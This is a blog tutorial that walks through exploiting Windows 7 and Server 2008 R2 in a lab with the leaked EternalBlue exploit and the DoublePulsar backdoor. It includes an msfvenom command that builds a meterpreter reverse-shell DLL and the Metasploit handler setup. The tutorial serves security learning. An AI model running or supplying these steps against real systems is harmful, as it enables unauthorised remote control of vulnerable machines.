Exploiting Windows 7 & 2008 with EternalBlue and DoublePulsar

Few weeks back ShadowBrokers and Equation Group two hacking groups managed to leak NSA’s version of hacking tool “Fuzz Bunch” which can be maliciously utilized to hack any Windows 7 and Server 2008 R2 (x64) All Service Packs without needing authentication.

The FuzzBunch tool kit comes with a pre-cooked exploit EternalBlue that exploits Windows SMB vulnerability and plugin DoublePulsar. For your information the same exploit code was taken advantage off to create WannaCry ransomeware that was successful in creating a big impact on computer networks all around the world.

With all that happened in the past, I decided to document the step by step approach of hacking a Windows 7 machine with FuzzBunch Toolkit.  So let’s get started.

Note: This tutorial is just for informational and educational purposes, the author will not be responsible for any illegal hacking attempts against individuals or a production network made by any individual or a group.

Environment:


  • Windows 7 : 10.21.1.118 : Attacking Machine installed with Fuzz Bunch (installation of fuzzbunch has few dependencies like python-2.6, pywin32-212)
  • Kali: 10.21.1.119: Second attacking machine that will be used for creating malicious dll and for gaining access
  • Windows 7: 10.21.1.124 : Victim
  1. Once you have the setup ready, execute “python fb.py” on windows attacking machine to initialize fuzzbunch toolkit.
  2. Next configure the victim IP,  fall back IP, redirection, project name and log directory (attacking Windows 7).
  3. The first step in exploitation is to select the EternalBlue exploit so we can execute the FuzzBunch. On the cmd prompt type “use EternalBlue” and press enter to configure the options available, such as target IP, port, target os, etc.
  4. Once you are done it will ask you to execute EternalBlue, you can press enter to execute on the target.
  5. As you can the target is successfully exploited and we should see the message “Eternalblue Succeeded”
  6. Now its time to gain access to the machine using the backdoor installed. And for this purpose we will use “msfvenom” available in kali to create a malicious dll and inject the same through “DoublePulsar” plugin.
  7. Execute the below msfvenom command to create a malicious dll. “msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<kali machine IP> LPORT=<any non-standard port> -f dll -o <filename.dll>”
  8. Copy the dll to windows attacking machine to be able to inject while using DoublePulsar plugin.
  9. Launch plugin by typing “use Doublepulsar” and configure target ip, port, protocol, target os architecture, malicious dll to be injected, etc.
  10. Before you execute the plugin open metasploit and use “exploit/multi/handler” with the same payload used while creating the dll and start listening.
  11. Now you are good to launch the “DoublePulsar” exploit, if all goes well you will successfully exploit the target to gain access.

Follow the similar steps to replicate the scenario in you test labs. Feel free to contact if you have any queries. charit0819[at]gmail[dot]com

PS: Metasploit has also developed modules for the detection and exploitation of the vulnerability.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s